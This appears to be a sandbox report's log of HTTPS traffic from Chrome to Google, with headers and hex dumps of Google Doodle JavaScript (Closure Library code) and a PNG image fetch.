2024-09-26 15:55:25 UTC	690	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 1157821 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 07:06:08 GMT Expires: Fri, 26 Sep 2025 07:06:08 GMT Cache-Control: public, max-age=31536000 Last-Modified: Wed, 25 Sep 2024 17:27:58 GMT Content-Type: text/javascript Vary: Accept-Encoding Age: 31757 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:25 UTC	700	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 76 61 72 20 6d 2c 61 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 62 61 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 Data Ascii: (function(){'use strict';var m,aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"obje
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 63 28 64 29 7b 72 65 74 75 72 6e 20 61 2e 74 68 72 6f 77 28 64 29 7d 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 66 28 67 29 7b 67 2e 64 6f 6e 65 3f 64 28 67 2e 76 61 6c 75 65 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 67 2e 76 61 6c 75 65 29 2e 74 68 65 6e 28 62 2c 63 29 2e 74 68 65 6e 28 66 2c 65 29 7d 66 28 61 2e 6e 65 78 74 28 29 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 29 7b 72 65 74 75 72 6e 20 66 61 28 61 28 29 29 7d 65 61 28 22 53 79 6d 62 6f 6c 2e 64 69 73 70 6f 73 65 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 53 79 6d 62 6f 6c 28 22 53 79 6d 62 6f 6c 2e 64 69 73 70 6f 73 65 22 29 7d 29 Data Ascii: }function c(d){return a.throw(d)}return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(b,c).then(f,e)}f(a.next())})}function q(a){return fa(a())}ea("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")})
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 6f 74 6f 74 79 70 65 2e 66 6c 61 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 31 3a 62 3b 76 61 72 20 63 3d 5b 5d 3b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 64 29 26 26 62 3e 30 3f 28 64 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6c 61 74 2e 63 61 6c 6c 28 64 2c 62 2d 31 29 2c 63 2e 70 75 73 68 2e 61 70 70 6c 79 28 63 2c 64 29 29 3a 63 2e 70 75 73 68 28 64 29 7d 29 3b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 Data Ascii: ototype.flat",function(a){return a?a:function(b){b=b===void 0?1:b;var c=[];Array.prototype.forEach.call(this,function(d){Array.isArray(d)&&b>0?(d=Array.prototype.flat.call(d,b-1),c.push.apply(c,d)):c.push(d)});return c}});/* Copyright The Closure Librar
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 7c 7c 62 3d 3d 3d 76 6f 69 64 20 30 3f 63 5b 64 5d 26 26 63 5b 64 5d 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 5b 64 5d 3f 63 3d 63 5b 64 5d 3a 63 3d 63 5b 64 5d 3d 7b 7d 3a 63 5b 64 5d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 74 61 28 61 2c 62 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 63 2e 70 72 6f 74 6f 74 79 70 65 3d 62 2e 70 72 6f 74 6f 74 79 70 65 3b 61 2e 4e 62 3d 62 2e 70 72 6f 74 6f 74 79 70 65 3b 61 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 65 77 20 63 3b 61 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 61 3b 61 2e 58 6b 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 29 7b 66 6f 72 28 76 61 72 20 67 3d 41 72 72 61 79 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 32 29 2c 68 3d 32 3b 68 3c 61 72 67 75 6d 65 Data Ascii: \|\|b===void 0?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b}function ta(a,b){function c(){}c.prototype=b.prototype;a.Nb=b.prototype;a.prototype=new c;a.prototype.constructor=a;a.Xk=function(d,e,f){for(var g=Array(arguments.length-2),h=2;h<argume
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 28 62 3d 62 2e 75 73 65 72 41 67 65 6e 74 29 62 72 65 61 6b 20 61 3b 62 3d 22 22 7d 72 65 74 75 72 6e 20 62 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 4d 61 28 29 7b 72 65 74 75 72 6e 20 46 61 3f 21 21 49 61 26 26 49 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 4e 61 28 29 7b 72 65 74 75 72 6e 20 4d 61 28 29 3f 4b 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 4c 61 28 22 43 68 72 6f 6d 65 22 29 7c 7c 4c 61 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 4d 61 28 29 3f 30 3a 4c 61 28 22 45 64 67 65 22 29 29 7c 7c 4c 61 28 22 53 69 6c 6b 22 29 7d 3b 63 6f 6e 73 74 20 4f 61 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 4f 66 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 Data Ascii: (b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function Ma(){return Fa?!!Ia&&Ia.brands.length>0:!1}function Na(){return Ma()?Ka("Chromium"):(La("Chrome")\|\|La("CriOS"))&&!(Ma()?0:La("Edge"))\|\|La("Silk")};const Oa=Array.prototype.indexOf?function(a,b)
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 6f 72 28 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 6c 3d 61 2e 63 68 61 72 41 74 28 64 2b 2b 29 2c 6e 3d 53 61 5b 6c 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 21 2f 5e 5b 5c 73 5c 78 61 30 5d 2a 24 2f 2e 74 65 73 74 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 60 22 2b 6c 29 3b 7d 72 65 74 75 72 6e 20 6b 7d 55 61 28 29 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 3b 29 7b 76 61 72 20 65 3d 63 28 2d 31 29 2c 66 3d 63 28 30 29 2c 67 3d 63 28 36 34 29 2c 68 3d 63 28 36 34 29 3b 69 66 28 68 3d 3d 3d 36 34 26 26 65 3d 3d 3d 2d 31 29 62 72 65 61 6b 3b 62 28 65 3c 3c 32 7c 66 3e 3e 34 29 3b 67 21 3d 36 34 26 26 28 62 28 66 3c 3c 34 26 32 34 30 7c 67 3e 3e 32 29 2c 68 21 3d 36 34 26 26 62 28 67 3c 3c 36 26 31 39 32 Data Ascii: or(;d<a.length;){var l=a.charAt(d++),n=Sa[l];if(n!=null)return n;if(!/^[\s\xa0]*$/.test(l))throw Error("e`"+l);}return k}Ua();for(var d=0;;){var e=c(-1),f=c(0),g=c(64),h=c(64);if(h===64&&e===-1)break;b(e<<2\|f>>4);g!=64&&(b(f<<4&240\|g>>2),h!=64&&b(g<<6&192
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 3d 3d 3d 30 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 67 22 29 3b 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 6a 62 28 61 2c 62 29 7b 61 2e 5f 5f 63 6c 6f 73 75 72 65 5f 5f 65 72 72 6f 72 5f 5f 63 6f 6e 74 65 78 74 5f 5f 39 38 34 33 38 32 7c 7c 28 61 2e 5f 5f 63 6c 6f 73 75 72 65 5f 5f 65 72 72 6f 72 5f 5f 63 6f 6e 74 65 78 74 5f 5f 39 38 34 33 38 32 3d 7b 7d 29 3b 61 2e 5f 5f 63 6c 6f 73 75 72 65 5f 5f 65 72 72 6f 72 5f 5f 63 6f 6e 74 65 78 74 5f 5f 39 38 34 33 38 32 2e 73 65 76 65 72 69 74 79 3d 62 7d 3b 6c 65 74 20 6b 62 3b 66 75 6e 63 74 69 6f 6e 20 6c 62 28 29 7b 63 6f 6e 73 74 20 61 3d 45 72 72 6f 72 28 29 3b 6a 62 28 61 2c 22 69 6e 63 69 64 65 6e 74 22 29 3b 45 61 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 62 28 61 29 7b 61 3d 45 72 72 6f 72 28 61 29 3b 6a Data Ascii: ===0)throw Error("g");}};function jb(a,b){a.__closure__error__context__984382\|\|(a.__closure__error__context__984382={});a.__closure__error__context__984382.severity=b};let kb;function lb(){const a=Error();jb(a,"incident");Ea(a)}function mb(a){a=Error(a);j
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 47 62 28 61 29 7b 72 65 74 75 72 6e 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 2e 6c 65 6e 67 74 68 3f 21 31 3a 77 62 28 61 29 26 31 3f 21 30 3a 21 31 7d 76 61 72 20 48 62 3b 63 6f 6e 73 74 20 49 62 3d 5b 5d 3b 79 62 28 49 62 2c 35 35 29 3b 48 62 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 49 62 29 3b 0a 66 75 6e 63 74 69 6f 6e 20 4a 62 28 61 29 7b 69 66 28 61 26 32 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 7d 6c 65 74 20 4b 62 3b 66 75 6e 63 74 69 6f 6e 20 4c 62 28 61 2c 62 29 7b 28 62 3d 4b 62 3f 62 5b 4b 62 5d 3a 76 6f 69 64 20 30 29 26 26 28 61 5b 4b 62 5d 3d 6f 62 28 62 29 29 7d 76 61 72 20 4d 62 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 7d 29 3b 4f Data Ascii: void 0}return a}function Gb(a){return!Array.isArray(a)\|\|a.length?!1:wb(a)&1?!0:!1}var Hb;const Ib=[];yb(Ib,55);Hb=Object.freeze(Ib);function Jb(a){if(a&2)throw Error();}let Kb;function Lb(a,b){(b=Kb?b[Kb]:void 0)&&(a[Kb]=ob(b))}var Mb=Object.freeze({});O
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 37 37 32 31 35 29 2b 63 2a 36 37 37 37 32 31 36 2b 62 2a 36 37 31 30 36 35 36 2c 63 2b 3d 62 2a 38 31 34 37 34 39 37 2c 62 2a 3d 32 2c 61 3e 3d 31 45 37 26 26 28 63 2b 3d 61 2f 31 45 37 3e 3e 3e 30 2c 61 25 3d 31 45 37 29 2c 63 3e 3d 31 45 37 26 26 28 62 2b 3d 63 2f 31 45 37 3e 3e 3e 30 2c 63 25 3d 31 45 37 29 2c 63 3d 62 2b 68 63 28 63 29 2b 68 63 28 61 29 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 68 63 28 61 29 7b 61 3d 53 74 72 69 6e 67 28 61 29 3b 72 65 74 75 72 6e 22 30 30 30 30 30 30 30 22 2e 73 6c 69 63 65 28 61 2e 6c 65 6e 67 74 68 29 2b 61 7d 0a 66 75 6e 63 74 69 6f 6e 20 69 63 28 61 29 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3c 31 36 29 64 63 28 4e 75 6d 62 65 72 28 61 29 29 3b 65 6c 73 65 20 69 66 28 6e 62 28 29 29 61 3d 42 69 67 Data Ascii: 77215)+c6777216+b6710656,c+=b8147497,b=2,a>=1E7&&(c+=a/1E7>>>0,a%=1E7),c>=1E7&&(b+=c/1E7>>>0,c%=1E7),c=b+hc(c)+hc(a));return c}function hc(a){a=String(a);return"0000000".slice(a.length)+a}function ic(a){if(a.length<16)dc(Number(a));else if(nb())a=Big
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 24 2f 2e 74 65 73 74 28 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 7d 65 6c 73 65 20 69 66 28 50 62 28 62 29 26 26 21 4e 75 6d 62 65 72 2e 69 73 53 61 66 65 49 6e 74 65 67 65 72 28 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 53 62 3f 61 3d 42 69 67 49 6e 74 28 61 29 3a 61 3d 52 62 28 61 29 3f 61 3f 22 31 22 3a 22 30 22 3a 51 62 28 61 29 3f 61 2e 74 72 69 6d 28 29 7c 7c 22 30 22 3a 53 74 72 69 6e 67 28 61 29 3b 72 65 74 75 72 6e 20 61 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 72 63 28 61 29 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 72 63 28 61 29 7b 61 3d 4d 61 74 68 2e 74 72 75 6e 63 28 61 29 3b 4e 75 6d 62 65 72 2e 69 73 53 61 66 65 49 6e 74 65 67 65 72 28 61 29 7c 7c 28 64 63 28 61 29 Data Ascii: $/.test(b))throw Error(String(b));}else if(Pb(b)&&!Number.isSafeInteger(b))throw Error(String(b));Sb?a=BigInt(a):a=Rb(a)?a?"1":"0":Qb(a)?a.trim()\|\|"0":String(a);return a;default:return rc(a)}}function rc(a){a=Math.trunc(a);Number.isSafeInteger(a)\|\|(dc(a)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.16	49722	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:25 UTC	740	OUT	GET /logos/2024/popcorn/rc4/cta.png HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:26 UTC	691	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 27042 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 25 Sep 2024 19:16:08 GMT Expires: Thu, 25 Sep 2025 19:16:08 GMT Cache-Control: public, max-age=31536000 Last-Modified: Wed, 25 Sep 2024 18:30:00 GMT Content-Type: image/png Age: 74358 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:26 UTC	699	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 59 00 00 00 b2 08 03 00 00 00 df d8 4c 1c 00 00 02 f7 50 4c 54 45 47 70 4c 9f 3c 5f 9c 2d 2c d7 3f 24 b1 20 2c 74 17 76 9b 1d 2e 5a 12 6f 2c 11 67 74 58 d5 a8 23 2a 35 11 5d 83 28 32 9c 29 35 85 22 3a 7f 20 39 76 20 2c 71 1b 3d 64 24 23 5f 0b 42 41 01 48 3a 02 43 30 03 3f 20 13 2f 5f 32 38 34 0f 47 56 1f 1a 29 09 41 23 15 45 8e 25 34 51 01 4a 49 01 4b 89 24 36 96 1e 3c 97 15 31 96 0e 26 94 36 38 94 28 32 9a 2b 30 a0 22 2a ad 25 25 a9 33 2c d7 68 1b db 7a 16 ba 46 2b bc 36 23 c9 61 20 f1 96 0c fe a3 09 fe 9b 0d b1 38 2a ed 8d 09 c5 42 23 e3 84 16 cb 4e 03 ca 52 29 a2 2f 2e 69 1f 06 c1 4d 2a 5e 16 03 ab 47 1d 3f 26 14 55 08 01 5e 36 58 65 06 00 5b 3e 77 5c 41 81 60 45 8a a5 3c 33 f6 8b 20 f1 a1 15 d0 Data Ascii: PNGIHDRYLPLTEGpL<_-,?$ ,tv.Zo,gtX#5](2)5": 9v ,q=d$#_BAH:C0? /_284GV)A#E%4QJIK$6<1&68(2+0"%%3,hzF+6#a 8B#NR)/.iM^G?&U^6Xe[>w\A`E<3
2024-09-26 15:55:26 UTC	1390	IN	Data Raw: 8b dc 45 08 01 e9 76 21 ea af 9a e3 a7 b1 da 9d cb d0 94 e1 d4 92 ec d4 90 f3 c2 91 dd b1 8e db 9e 8b dd a0 8f e4 a7 93 ed ab 98 f6 b0 9d fe 9b 86 d4 8c 79 ba 98 7f c8 9e 95 ec b6 a3 ff a4 a3 fe b1 7d c1 a0 21 46 a8 22 4b b6 ae ff 9d 71 b6 97 2b 51 9f 9d f7 9b 5f 9b b0 22 50 ef a9 fe b6 6b dd 91 63 a0 f2 0f f3 84 00 00 00 fd 74 52 4e 53 00 1a 42 62 7b 71 9c 9b a2 3e bc c1 ca dd ff ff ff ff ff ff ff ff ff ff ff e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: Ev!y}!F"Kq+Q_"PkctRNSBb{q>
2024-09-26 15:55:26 UTC	1390	IN	Data Raw: c7 e2 ad ea ce 74 78 d6 91 fd c3 c2 c0 8b fd 3f 21 35 33 da 93 32 ed 9f 5b 1b ac 46 68 d1 d8 51 ac a3 1c b3 80 4d 7b aa e0 6a b0 5e 81 14 d4 f5 bb 8b ad b0 aa 93 a2 45 53 10 47 88 24 d8 af 2e 36 97 1d cb fb cd 72 8c 36 a1 4b 0b c2 0a 29 56 6a 08 19 70 1a cf 4c eb 40 05 ea 30 59 9a 96 17 70 9a f3 68 91 b4 3f 1f 26 5b 97 42 41 b3 80 46 8b c9 a0 97 15 a5 68 51 b6 ef d2 c1 94 e5 b4 1f b8 90 26 c6 55 1d 26 e2 0c b5 03 2a 63 db ed 76 bb 8b a1 e0 3c c5 95 2d 5b b4 e7 af d6 12 1a 2c 45 f5 f5 fe 14 13 8d c8 e6 93 19 41 1e a7 19 ac c8 83 b5 c6 d1 5f 8c f1 ec e4 56 74 7a 72 72 52 1c a2 cb fc 66 1e 3c f4 6c b9 8f 83 9f fe 87 6c f5 54 89 41 4f 60 d0 10 46 51 03 ac ae cb a7 7c ef 65 db 62 c7 b6 5d c8 4e 8b b6 76 86 15 56 c8 82 f9 ec 9c 96 a5 3a 89 d0 ee 75 50 b4 0a 37 Data Ascii: tx?!532[FhQM{j^ESG$.6r6K)VjpL@0Yph?&[BAFhQ&U&*cv<-[,EA_VtzrrRf<llTAO`FQ\|eb]NvV:uP7
2024-09-26 15:55:26 UTC	1390	IN	Data Raw: 5b d4 31 62 36 13 e7 22 b2 f8 99 fe 27 b6 e2 be 48 4e c1 59 de 36 cb d3 59 23 96 b8 35 99 39 74 9e 2e 69 56 85 d0 78 55 ad d2 7c 4a 92 63 e0 fb 95 8a e7 2d 90 50 5a 28 23 f0 16 4a 9e d8 07 73 65 5f de 2c dd 50 91 8a 50 aa 4d 21 b1 b2 27 57 4c c5 3a 66 ac 37 eb 37 6e de f8 01 6e fe 85 95 16 3d bd 71 63 d0 89 19 0b 04 56 82 0b 99 b5 ef d2 98 d9 6b 22 3f a2 d1 ea 32 88 d0 49 42 c3 e6 32 dd 9a ab 66 67 8a f6 b2 aa 96 e7 9f 3f 83 91 4e 43 34 5a a5 56 16 02 7a b5 b9 4c 63 5e c3 03 74 bb b4 b0 ec 19 ad 9e 87 a7 2b 97 fd 06 9a 7c 50 df 2f 60 1e a4 5a d6 83 29 17 3b 09 20 5f c8 cb e5 c3 a2 d3 6c 4e ff 88 58 30 7f 03 e5 e0 ff 02 1c d4 b8 ac f2 09 b2 47 a6 99 cd a9 59 7b 61 e0 38 b3 12 59 14 c9 2f 85 15 5a eb cd 8e d0 6a 35 71 65 2d 33 83 71 ab 47 d7 a5 56 a5 e4 a4 Data Ascii: [1b6"'HNY6Y#59t.iVxU\|Jc-PZ(#Jse_,PPM!'WL:f77nn=qcVk"?2IB2fg?NC4ZVzLc^t+\|P/`Z); _lNX0GY{a8Y/Zj5qe-3qGV
2024-09-26 15:55:26 UTC	1390	IN	Data Raw: cb ed d1 bc 14 5a 47 d4 14 c2 82 68 25 2c 07 97 98 d8 3c 9b 74 cd ac 98 4b cd 9a 6d 56 46 56 6a 80 de 91 c9 35 3b 5d 2d 04 4a 39 cb ac ea d5 d3 27 64 70 72 7a fa e6 c3 ab 83 c3 4f 9d 95 7a 25 f0 58 fb 1a 5e 83 79 6d 04 29 ed c6 1c 74 30 af 9b 08 6c ca c0 06 1a cf f6 f6 86 7b 7b fd fe d9 e0 18 4e 33 fa 7d d8 4f 84 4d f4 68 93 6e af 95 7d 59 e3 aa 5b c8 a5 d9 75 cd ec 38 af 94 3a 96 23 ab d8 c2 2c c8 b9 61 e8 aa da bc 3b 33 ab d7 f2 8e 74 60 cc e6 08 33 cb 9d 54 3c a6 cc 1e 3c a0 5a 07 97 db 9d 75 06 76 5c 66 c7 c8 65 6c 99 db d3 d3 7d c8 fd f9 e9 ca ca 7a d0 f0 98 57 34 b5 ca 65 2b a6 75 89 2b 0a 41 6a e8 4c 62 9a 1a e5 80 76 7c fc f9 0c 56 81 3e a5 ce 05 91 4b 50 4c 40 32 e7 07 a4 91 c9 85 d9 c2 88 d9 f9 f1 5a 8f ec 7e c1 ed df 9a 4e 5e 6c 62 3b 93 01 95 Data Ascii: ZGh%,<tKmVFVj5;]-J9'dprzOz%X^ym)t0l{{N3}OMhn}Y[u8:#,a;3t`3T<<Zuv\fel}zW4e+u+AjLbv\|V>KPL@2Z~N^lb;
2024-09-26 15:55:26 UTC	1390	IN	Data Raw: 16 32 70 65 6f f5 89 50 a6 28 2c cb 8d ed ed b5 3d de a1 c8 17 75 16 eb 1b 6e 2e 5c ff 59 02 eb 4c 67 1d 0a 5d bc 47 dd 04 2a 6d 18 08 66 d0 58 fa 56 e9 5b a6 6c 8e e9 89 77 e8 ba 7c 99 45 51 be 75 18 58 4e 22 82 d2 5e 58 e9 4a 81 ec 7f b4 be ce 01 4f 2d 1f 5d 2c ae 21 e9 8a 70 51 21 26 a3 b5 8b c4 95 1b 4e a4 f1 2f 4e ca 8d f6 31 31 11 95 bb 55 74 5a c5 0d 77 8a c4 01 8b 10 ae d1 dc 0c 2d 4a cb 0b da 6b a8 ec 32 5c d1 51 cb 6a 15 ac a7 8a 1c c5 00 55 1c 74 e5 37 85 90 8b 1d 45 2b 2b f2 27 71 46 c6 78 d8 93 2a 6f f9 44 ca 1b bb 22 3f 63 59 4b a5 41 4a bf 08 63 6a 1c 34 0c 6a 5e 5e ce d6 db 6d c9 95 6d 3f 80 ec 88 94 65 57 66 0d ee 67 8d 44 22 98 07 6a 38 6c 56 72 04 b3 a0 ee 1c 40 5f e3 90 ed cd 71 a1 6a b4 57 25 79 0d eb 31 8c de 18 ee ab c7 c4 35 6b 0b Data Ascii: 2peoP(,=un.\YLg]GmfXV[lw\|EQuXN"^XJO-],!pQ!&N/N11UtZw-Jk2\QjUt7E++'qFxoD"?cYKAJcj4j^^mm?eWfgD"j8lVr@_qjW%y15k
2024-09-26 15:55:26 UTC	1390	IN	Data Raw: b8 bd d3 d7 3e 85 1d f8 c3 32 b5 b5 ac 11 b6 ca 87 5d 24 7b 4b c2 2e a3 b1 bd 72 b6 32 eb 67 0f 4d 55 ce 27 9f 7c b2 bb bb 8b e2 16 2b b0 7d 8b 64 8d 07 37 e3 1a ac 28 26 2c 39 d4 d9 32 ec 2b c8 c3 75 16 d8 65 ec 31 7f 11 3e 77 e5 e1 17 5d f5 81 7a 5c d7 35 ec ae 0e 54 9b ae 55 26 62 3c d2 0e 59 4f 4d 95 6d 10 a0 b1 48 74 49 8c cd ee e9 e9 c4 b6 b7 37 3b 03 a6 68 5c 14 b2 6c 97 a0 54 f0 17 7e f4 b9 43 ac f6 e1 01 90 6e c2 22 6d 20 b8 15 4c 37 37 0d a4 eb c4 74 94 ff bc 08 c5 62 8b 45 89 cf 98 07 cb a8 2d 64 1d c5 0e 9a 04 3a ab 42 6d b5 b2 7e c2 b0 bb 9f 3c 7f fe 7c 77 f7 f9 8b 6c 4c dc e3 3c 04 38 6c 45 ae 24 0b 48 c2 c4 46 9d a5 cf 0b f2 b0 03 d1 bf cb 23 98 6b ec 52 ea 0e 7f 3e 06 b4 17 02 d5 75 35 21 13 f6 c2 d0 10 96 fa a8 2c 21 b6 23 e1 01 4f 33 c9 Data Ascii: >2]${K.r2gMU'\|+}d7(&,92+ue1>w]z\5TU&b<YOMmHtI7;h\lT~Cn"m L77tbE-d:Bm~<\|wlL<8lE$HF#kR>u5!,!#O3
2024-09-26 15:55:26 UTC	1390	IN	Data Raw: 3a ad 64 5e 64 82 4d f7 f9 e9 3b 42 bb eb 18 f4 7a af fb a3 9f b8 d4 f1 27 4f c1 95 d0 32 dc fb 77 ff 14 25 42 9d ec 22 d2 c0 52 76 59 d0 3e 50 1c 44 96 c3 14 5c 4f 38 1d 38 4b 61 88 c8 5a c1 32 e7 93 75 ba bf e9 a4 0b 8b 97 c7 13 b8 71 c5 83 1d 29 cf 8d c1 9b 48 5d 59 f5 f6 1b 5c 01 76 40 92 e0 22 18 d6 c4 15 cf 9c b3 6b 99 6c 56 17 9a 5e c9 b3 32 6b 18 71 f7 a3 b1 72 99 d0 3a b8 ed a5 ee 0c 9e fd 11 58 61 21 e3 f2 ab b6 50 d3 63 fd 8c 15 4f 07 07 02 6c 8b 71 ed d3 c7 4f 9f 3e 35 d0 12 58 aa 13 3e 27 9e e0 db 64 bf 7b df 5a 1c 58 d0 de b6 bf d5 46 a0 48 d8 18 a6 6b 33 80 76 97 ec f7 e8 fd a6 27 93 79 db de b4 e8 ea da 1d 70 9d f1 dc e8 76 c8 38 1a de 15 08 82 ac 2a 49 1a c8 86 76 c8 0e cb 2e 3f 95 04 f0 ac d9 